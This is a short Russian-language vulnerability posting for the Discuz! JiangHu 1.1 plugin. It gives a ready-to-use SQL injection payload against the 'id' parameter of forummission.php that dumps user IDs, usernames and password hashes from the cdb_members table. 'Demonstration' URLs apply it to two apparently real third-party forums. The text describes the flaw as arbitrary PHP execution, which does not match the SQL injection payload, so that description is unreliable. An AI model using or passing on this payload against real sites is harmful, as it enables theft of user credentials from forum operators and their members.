Программа: Discuz! Plugin JiangHu 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «id» сценарием forummission.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11
from cdb_members—

http://target/[path]/forummission.php?index=show&id=24
and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11
from cdb_members—

Демонстрация:

http://www.palslp.com/forummission.php?index=show&id=24
and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11
from cdb_members—

http://bbs.sunspals.com/forummission.php?index=show&id=24
and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11
from cdb_members—



Оставить мнение